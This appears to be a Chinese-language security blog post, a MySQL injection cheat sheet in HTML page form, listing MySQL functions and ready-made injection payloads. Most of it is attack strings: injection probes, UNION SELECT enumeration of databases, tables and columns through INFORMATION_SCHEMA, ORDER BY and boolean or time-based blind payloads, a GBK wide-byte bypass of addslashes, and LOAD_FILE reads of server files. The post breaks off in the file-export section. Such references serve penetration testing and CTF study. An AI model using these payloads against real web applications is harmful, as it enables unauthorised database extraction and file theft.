<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="m0sway">





<title>Mysql注入备忘录 | m0sway&#39;s Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 6.3.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">m0sway&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">m0sway&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">Mysql注入备忘录</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">m0sway</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">二月 17, 2022&nbsp;&nbsp;21:51:15</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/SQli/">SQli</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="查看当前数据库版本"><a href="#查看当前数据库版本" class="headerlink" title="查看当前数据库版本"></a>查看当前数据库版本</h2><ul>
<li>VERSION()</li>
<li>@@VERSION</li>
<li>@@GLOBAL.VERSION</li>
</ul>
<h2 id="当前登录用户"><a href="#当前登录用户" class="headerlink" title="当前登录用户"></a>当前登录用户</h2><ul>
<li>USER()</li>
<li>CURRENT_USER()</li>
<li>SYSTEM_USER()</li>
<li>SESSION_USER()</li>
</ul>
<h2 id="当前使用的数据库"><a href="#当前使用的数据库" class="headerlink" title="当前使用的数据库"></a>当前使用的数据库</h2><ul>
<li>DATABASE()</li>
<li>SCHEMA()</li>
</ul>
<h2 id="路径相关"><a href="#路径相关" class="headerlink" title="路径相关"></a>路径相关</h2><ul>
<li>@@BASEDIR : mysql安装路径：</li>
<li>@@SLAVE_LOAD_TMPDIR : 临时文件夹路径：</li>
<li>@@DATADIR : 数据存储路径：</li>
<li>@@CHARACTER_SETS_DIR : 字符集设置文件路径</li>
<li>@@LOG_ERROR : 错误日志文件路径：</li>
<li>@@PID_FILE : pid-file文件路径</li>
<li>@@SLAVE_LOAD_TMPDIR : 临时文件夹路径：</li>
</ul>
<h2 id="联合数据"><a href="#联合数据" class="headerlink" title="联合数据"></a>联合数据</h2><ul>
<li>CONCAT()</li>
<li>GROUP_CONCAT()</li>
<li>CONCAT_WS()</li>
</ul>
<h2 id="字母-数字相关"><a href="#字母-数字相关" class="headerlink" title="字母&#x2F;数字相关"></a>字母&#x2F;数字相关</h2><ul>
<li>ASCII(): 获取字母的ascii码值</li>
<li>BIN(): 返回值的二进制串表示</li>
<li>CONV(): 进制转换</li>
<li>FLOOR()</li>
<li>ROUND()</li>
<li>LOWER()：转成小写字母</li>
<li>UPPER(): 转成大写字母</li>
<li>HEX():十六进制编码</li>
<li>UNHEX()：十六进制解码</li>
</ul>
<h2 id="字符串截取"><a href="#字符串截取" class="headerlink" title="字符串截取"></a>字符串截取</h2><ul>
<li>MID()</li>
<li>LEFT()</li>
<li>SUBSTR()</li>
<li>SUBSTRING()</li>
</ul>
<h2 id="注释"><a href="#注释" class="headerlink" title="注释"></a>注释</h2><h3 id="行间注释"><a href="#行间注释" class="headerlink" title="行间注释"></a>行间注释</h3><ul>
<li>— - (—后面有个空格)<ul>
<li>DROP sampletable;—</li>
</ul>
</li>
<li><h1 id=""><a href="#" class="headerlink" title=""></a></h1><ul>
<li>DROP sampletable;#</li>
</ul>
</li>
<li>&#96; (反引号)</li>
</ul>
<h3 id="行内注释"><a href="#行内注释" class="headerlink" title="行内注释"></a>行内注释</h3><ul>
<li>&#x2F;* <em>&#x2F;<br>+DROP&#x2F;</em> 内容 *&#x2F;sampletable;</li>
<li>&#x2F;*! 语句 *&#x2F;<ul>
<li>&#x2F;*! select * from test *&#x2F;</li>
<li>语句会被执行</li>
</ul>
</li>
</ul>
<h1 id="注入技术"><a href="#注入技术" class="headerlink" title="注入技术"></a>注入技术</h1><h2 id="判断是否存在注入"><a href="#判断是否存在注入" class="headerlink" title="判断是否存在注入"></a>判断是否存在注入</h2><p>假设有: <a target="_blank" rel="noopener" href="http://www.test.com/chybeta.php?id=1">www.test.com/chybeta.php?id=1</a></p>
<h3 id="数值型注入"><a href="#数值型注入" class="headerlink" title="数值型注入"></a>数值型注入</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">chybeta.php?id<span class="operator">=</span><span class="number">1</span><span class="operator">+</span><span class="number">1</span></span><br><span class="line">chybeta.php?id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span></span><br><span class="line">chybeta.php?id<span class="operator">=</span><span class="number">-1</span> <span class="keyword">or</span> <span class="number">10</span><span class="number">-2</span><span class="operator">=</span><span class="number">8</span></span><br><span class="line">chybeta.php?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span></span><br><span class="line">chybeta.php?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<h3 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h3><p>参数被引号包围，我们需要闭合引号。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">chybeta.php?id<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;</span></span><br><span class="line"><span class="string">chybeta.php?id=1&quot;</span></span><br><span class="line"><span class="string">chybeta.php?id=1&#x27;</span> <span class="keyword">and</span> <span class="string">&#x27;1&#x27;</span><span class="operator">=</span><span class="string">&#x27;1</span></span><br><span class="line"><span class="string">chybeta.php?id=1&quot; and &quot;1&quot;=&quot;1</span></span><br></pre></td></tr></table></figure>

<h2 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h2><h3 id="查询列数"><a href="#查询列数" class="headerlink" title="查询列数"></a>查询列数</h3><p>用UNION SELECT注入时，若后面要注出的数据的列与原数据列数不同，则会失败。所以需要先猜解列数。</p>
<h4 id="UNION-SELECT"><a href="#UNION-SELECT" class="headerlink" title="UNION SELECT"></a>UNION SELECT</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> #</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">ALL</span> <span class="keyword">SELECT</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> #</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">ALL</span> <span class="keyword">SELECT</span> <span class="keyword">null</span>,<span class="keyword">null</span>,<span class="keyword">null</span> #</span><br></pre></td></tr></table></figure>

<h4 id="ORDER-BY"><a href="#ORDER-BY" class="headerlink" title="ORDER BY"></a>ORDER BY</h4><p>利用二分法</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="number">10</span> #</span><br><span class="line"><span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="number">5</span>  #</span><br><span class="line"><span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="number">2</span>  #</span><br><span class="line">....</span><br></pre></td></tr></table></figure>

<h3 id="查询数据库"><a href="#查询数据库" class="headerlink" title="查询数据库"></a>查询数据库</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> GROUP_CONCAT(schema_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.SCHEMATA #</span><br></pre></td></tr></table></figure>

<h3 id="查询表名"><a href="#查询表名" class="headerlink" title="查询表名"></a>查询表名</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> GROUP_CONCAT(table_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.TABLES <span class="keyword">WHERE</span> TABLE_SCHEMA<span class="operator">=</span>DATABASE() #</span><br></pre></td></tr></table></figure>

<p>假设获取到数据库名为”databasename”后，对其进行十六进制编码得到0x64617461626173656e616d65。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> GROUP_CONCAT(table_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.TABLES <span class="keyword">WHERE</span> TABLE_SCHEMA<span class="operator">=</span>DATABASE() #</span><br><span class="line"></span><br><span class="line">假设获取到数据库名为”databasename”后，对其进行十六进制编码得到<span class="number">0x64617461626173656e616d65</span>。</span><br><span class="line"></span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> GROUP_CONCAT(table_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.TABLES <span class="keyword">WHERE</span> TABLE_SCHEMA<span class="operator">=</span><span class="number">0x64617461626173656e616d65</span> #</span><br></pre></td></tr></table></figure>

<h3 id="查询列名"><a href="#查询列名" class="headerlink" title="查询列名"></a>查询列名</h3><p>由前一步获取到表名为tablename后，对其进行十六进制编码得到</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> GROUP_CONCAT(column_name SEPARATOR<span class="operator">+</span><span class="number">0x3c62723e</span>) <span class="keyword">FROM</span><span class="operator">+</span>INFORMATION_SCHEMA.COLUMNS <span class="keyword">WHERE</span> TABLE_NAME<span class="operator">=</span><span class="number">0x7461626c656e616d65</span> #</span><br></pre></td></tr></table></figure>

<h3 id="获取数据"><a href="#获取数据" class="headerlink" title="获取数据"></a>获取数据</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> GROUP_CONCAT(column_1,column_2 SEPARATOR<span class="operator">+</span><span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> databasename.tablename #</span><br></pre></td></tr></table></figure>

<h2 id="insert-update-delete注入"><a href="#insert-update-delete注入" class="headerlink" title="insert&#x2F;update&#x2F;delete注入"></a>insert&#x2F;update&#x2F;delete注入</h2><p>参考：<a target="_blank" rel="noopener" href="https://www.exploit-db.com/docs/33253.pdf">SQL Injection in Insert Update and Delete Statements</a><br>假设后台语句为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> <span class="keyword">user</span>(id,name,pass) <span class="keyword">values</span> (<span class="number">1</span>,&quot;chybeta&quot;,&quot;123456&quot;);</span><br></pre></td></tr></table></figure>

<h2 id="order-by后注入"><a href="#order-by后注入" class="headerlink" title="order by后注入"></a>order by后注入</h2><p>oder by由于是排序语句，所以可以利用条件语句做判断，根据返回的排序结果不同判断条件的真假。</p>
<h3 id="检测方法"><a href="#检测方法" class="headerlink" title="检测方法"></a>检测方法</h3><p>一般带有oder或者orderby的变量很可能是这种注入，在知道一个字段的时候可以采用如下方式注入：<br>原始链接：<a target="_blank" rel="noopener" href="http://www.test.com/list.php?order=vote">http://www.test.com/list.php?order=vote</a> 根据vote字段排序。<br>找到投票数最大的票数num然后构造以下链接，看排序是否变化。：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">list.php?<span class="keyword">order</span><span class="operator">=</span><span class="built_in">abs</span>(vote<span class="operator">-</span>(length(<span class="keyword">user</span>())<span class="operator">&gt;</span><span class="number">0</span>)<span class="operator">*</span>num)<span class="operator">+</span><span class="keyword">asc</span></span><br></pre></td></tr></table></figure>

<p>还有一种方法不需要知道任何字段信息，使用rand函数：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">list.php?<span class="keyword">order</span><span class="operator">=</span>rand(<span class="literal">true</span>)</span><br><span class="line">list.php?<span class="keyword">order</span><span class="operator">=</span>rand(<span class="literal">false</span>)</span><br></pre></td></tr></table></figure>

<p>以上两个会返回不同的排序。</p>
<h3 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h3><p>判断表名中第一个字符是否小于128的语句如下：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="operator">/</span><span class="operator">/</span>www.test.com<span class="operator">/</span>list.php?<span class="keyword">order</span><span class="operator">=</span>rand((<span class="keyword">select</span> <span class="type">char</span>(<span class="built_in">substring</span>(table_name,<span class="number">1</span>,<span class="number">1</span>)) <span class="keyword">from</span> information_schema.tables limit <span class="number">1</span>)<span class="operator">&lt;=</span><span class="number">128</span>))</span><br></pre></td></tr></table></figure>

<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><h3 id="盲注场景"><a href="#盲注场景" class="headerlink" title="盲注场景"></a>盲注场景</h3><p>在许多情况下，通过前面的测试会发现页面没有回显提取的数据，但是根据语句是否执行成功与否会有一些相应的变化。</p>
<ul>
<li>正确&#x2F;错误的语句使得页面有适度的变化。可以尝试使用布尔注入</li>
<li>正确语句返回正常页面，错误的语句返回通用错误页面。可以尝试使用布尔注入。</li>
<li>提交错误语句，不影响页面的正常输出。建议尝试使用延时注入。</li>
</ul>
<p>几种简单的判断语句，在真实利用中需要根据情况而变化:</p>
<ul>
<li>CASE</li>
<li>IF()</li>
<li>IFNULL()</li>
<li>NULLIF()</li>
</ul>
<h3 id="布尔盲注-基于响应"><a href="#布尔盲注-基于响应" class="headerlink" title="布尔盲注-基于响应"></a>布尔盲注-基于响应</h3><p>提交一个逻辑判断语句，来推断一个个的信息位。由于注入需要（一般）一个个字符的进行，所以需要利用脚本，或者工具（比如burp suite）。以下是：</p>
<h4 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span> i 用于提取每一个位，j 用于判断其对应的ASCII码值的范围。</span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> k ，结合limit，选择偏移为k的行</span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> <span class="operator">*</span><span class="operator">*</span>中可以填上其他的<span class="keyword">select</span>语句，比如查询表名，列名，数据。一次类推。</span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> SUBSTR() 也可以换成 <span class="built_in">SUBSTRING</span>()</span><br><span class="line"><span class="string">&#x27; OR (SELECT ASCII(SUBSTR(DATABASE(),i,1) ) &lt; j) #</span></span><br><span class="line"><span class="string">&#x27;</span> <span class="keyword">OR</span> (<span class="keyword">SELECT</span> ASCII(SUBSTR((<span class="keyword">SELECT</span> GROUP_CONCAT(schema_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.SCHEMATA),i,<span class="number">1</span>) ) <span class="operator">&lt;</span> j) #  </span><br><span class="line"><span class="string">&#x27; OR (SELECT SUBSTR(DATABASE(),i,1) &lt; j) #</span></span><br><span class="line"><span class="string">&#x27;</span> <span class="keyword">OR</span> (<span class="keyword">SELECT</span> SUBSTR((<span class="keyword">SELECT</span> GROUP_CONCAT(schema_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.SCHEMATA),i,<span class="number">1</span>) <span class="operator">&lt;</span> j) #  </span><br><span class="line"><span class="string">&#x27; OR SUBSTR((SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT k,1),i,1) &lt; j #</span></span><br><span class="line"><span class="string">...</span></span><br></pre></td></tr></table></figure>

<h4 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h4><p>脚本利用，可见：<a target="_blank" rel="noopener" href="https://chybeta.github.io/2017/07/16/XMAN%E9%80%89%E6%8B%94%E8%B5%9B-2017-web-writeup/#CTF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95">ctf盲注利用脚本</a><br>要点：</p>
<ul>
<li>注意编码问题</li>
<li>注意异常处理</li>
<li>注意边界处理</li>
</ul>
<h3 id="延时盲注-基于时间"><a href="#延时盲注-基于时间" class="headerlink" title="延时盲注-基于时间"></a>延时盲注-基于时间</h3><p>一般会用到几个函数。使用这些的效果，是为了延缓mysql的操作，从而检测到与平时有异的情况：</p>
<ul>
<li>SLEEP(n) 让mysql停n秒钟</li>
<li>BENCHMARK(count,expr) 重复countTimes次执行表达式expr</li>
</ul>
<p>一些注意事项：</p>
<ul>
<li>使用基于时间的盲注比较不准确，因为这还取决于当前的网络环境。</li>
<li>时间延缓最好不要超过30秒，否则容易导致mysql的API连接超时。</li>
<li>当在页面上看不到任何明显变化时，再考虑选择使用延时注入。</li>
</ul>
<h4 id="检测方法-1"><a href="#检测方法-1" class="headerlink" title="检测方法"></a>检测方法</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="keyword">OR</span> SLEEP(<span class="number">25</span>)<span class="operator">=</span><span class="number">0</span> LIMIT <span class="number">1</span> #</span><br><span class="line"><span class="number">1</span>) <span class="keyword">OR</span> SLEEP(<span class="number">25</span>)<span class="operator">=</span><span class="number">0</span> LIMIT <span class="number">1</span> #</span><br><span class="line"><span class="number">1</span><span class="string">&#x27; OR SLEEP(25)=0 LIMIT 1 #</span></span><br><span class="line"><span class="string">&#x27;</span>) <span class="keyword">OR</span> SLEEP(<span class="number">25</span>)<span class="operator">=</span><span class="number">0</span> LIMIT <span class="number">1</span> #</span><br><span class="line"><span class="number">1</span>)) <span class="keyword">OR</span> SLEEP(<span class="number">25</span>)<span class="operator">=</span><span class="number">0</span> LIMIT <span class="number">1</span> #</span><br><span class="line"><span class="keyword">SELECT</span> SLEEP(<span class="number">25</span>) #</span><br></pre></td></tr></table></figure>

<h4 id="payload-2"><a href="#payload-2" class="headerlink" title="payload"></a>payload</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> IF(SUBSTR((<span class="keyword">SELECT</span> GROUP_CONCAT(schema_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.SCHEMATA),i,<span class="number">1</span>) <span class="operator">&lt;</span> j,BENCHMARK(<span class="number">100000</span>,SHA1(<span class="number">1</span>)),<span class="number">0</span>)</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> IF(SUBSTR((<span class="keyword">SELECT</span> GROUP_CONCAT(schema_name SEPARATOR <span class="number">0x3c62723e</span>) <span class="keyword">FROM</span> INFORMATION_SCHEMA.SCHEMATA),i,<span class="number">1</span>) <span class="operator">&lt;</span> j,SLEEP(<span class="number">10</span>),<span class="number">0</span>)</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>有如下php代码：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">mysql_query(&quot;SET NAMES &#x27;gbk&#x27;&quot;);</span><br><span class="line">....</span><br><span class="line">$name <span class="operator">=</span> isset($_GET[<span class="string">&#x27;name&#x27;</span>]) ? addslashes($_GET[<span class="string">&#x27;name&#x27;</span>]) : <span class="number">1</span>;</span><br><span class="line">$<span class="keyword">sql</span> <span class="operator">=</span> &quot;SELECT * FROM test WHERE names=&#x27;&#123;$name&#125;&#x27;&quot;;</span><br></pre></td></tr></table></figure>

<p>addslashes()会在单引号或双引号前加上一个\。当mysql使用GBK字符集时，会把两个字符当作一个汉字，如%df%5c为運字。我们输入name&#x3D;root%df%27，%在服务器端会出现如下转换：root%df%27 -&gt; root%df%5c%27 -&gt; root運’。<br>更多内容可见：<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html">浅析白盒审计中的字符编码及SQL注入</a></p>
<h3 id="payload-3"><a href="#payload-3" class="headerlink" title="payload"></a>payload</h3><h4 id="吃掉"><a href="#吃掉" class="headerlink" title="吃掉\"></a>吃掉\</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">index.php?name<span class="operator">=</span><span class="number">1</span><span class="operator">%</span>df<span class="string">&#x27;</span></span><br><span class="line"><span class="string">index.php?name=1%a1&#x27;</span></span><br><span class="line">index.php?name<span class="operator">=</span><span class="number">1</span><span class="operator">%</span>aa<span class="string">&#x27;</span></span><br><span class="line"><span class="string">...</span></span><br></pre></td></tr></table></figure>

<p>在被addslashes后，出现%XX%5c，当前一个字符的ascii码值大于128时，会被认为是一个宽字符，即使它不是个汉字。所以不是仅仅%df可以吃掉’&#39;。</p>
<h4 id="利用"><a href="#利用" class="headerlink" title="利用\"></a>利用\</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?name<span class="operator">=</span><span class="operator">%</span><span class="operator">*</span><span class="operator">*</span><span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">5</span>c<span class="operator">%</span><span class="number">27</span></span><br></pre></td></tr></table></figure>

<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2><h2 id="文件读写"><a href="#文件读写" class="headerlink" title="文件读写"></a>文件读写</h2><p>利用sql注入可以导入导出文件，获取文件内容，或向文件写入内容。<br>查询用户读写权限：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> file_priv <span class="keyword">FROM</span> mysql.user <span class="keyword">WHERE</span> <span class="keyword">user</span> <span class="operator">=</span> <span class="string">&#x27;username&#x27;</span>;</span><br></pre></td></tr></table></figure>

<h3 id="load-file-读取"><a href="#load-file-读取" class="headerlink" title="load_file()读取"></a>load_file()读取</h3><h4 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h4><ul>
<li>需要有读取文件的权限</li>
<li>需要知道文件的绝对物理路径。</li>
<li>要读取的文件大小必须小于 max_allowed_packet</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> @<span class="variable">@max_allowed_packet</span>;</span><br></pre></td></tr></table></figure>

<h4 id="payload-4"><a href="#payload-4" class="headerlink" title="payload"></a>payload</h4><p>直接使用绝对路径,注意对路径中斜杠的处理。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> LOAD_FILE(&quot;C://TEST.txt&quot;) #</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> LOAD_FILE(&quot;C:/TEST.txt&quot;) #</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> LOAD_FILE(&quot;C:\\TEST.txt&quot;) #</span><br></pre></td></tr></table></figure>

<p>使用编码</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> LOAD_FILE(<span class="type">CHAR</span>(<span class="number">67</span>,<span class="number">58</span>,<span class="number">92</span>,<span class="number">92</span>,<span class="number">84</span>,<span class="number">69</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">46</span>,<span class="number">116</span>,<span class="number">120</span>,<span class="number">116</span>)) #</span><br><span class="line"><span class="keyword">UNION</span> <span class="keyword">SELECT</span> LOAD_FILE(<span class="number">0x433a5c5c544553542e747874</span>) #</span><br></pre></td></tr></table></figure>

<h3 id="select导出"><a href="#select导出" class="headerlink" title="select导出"></a>select导出</h3><h4 id="条件-1"><a href="#条件-1" class="headerlink" title="条件"></a>条件</h4><ul>
<li>一般要指定绝对路径</li>
<li>需导出的目录有可写权限</li>
<li>要outfile出的文件不能已经存在</li>
</ul>
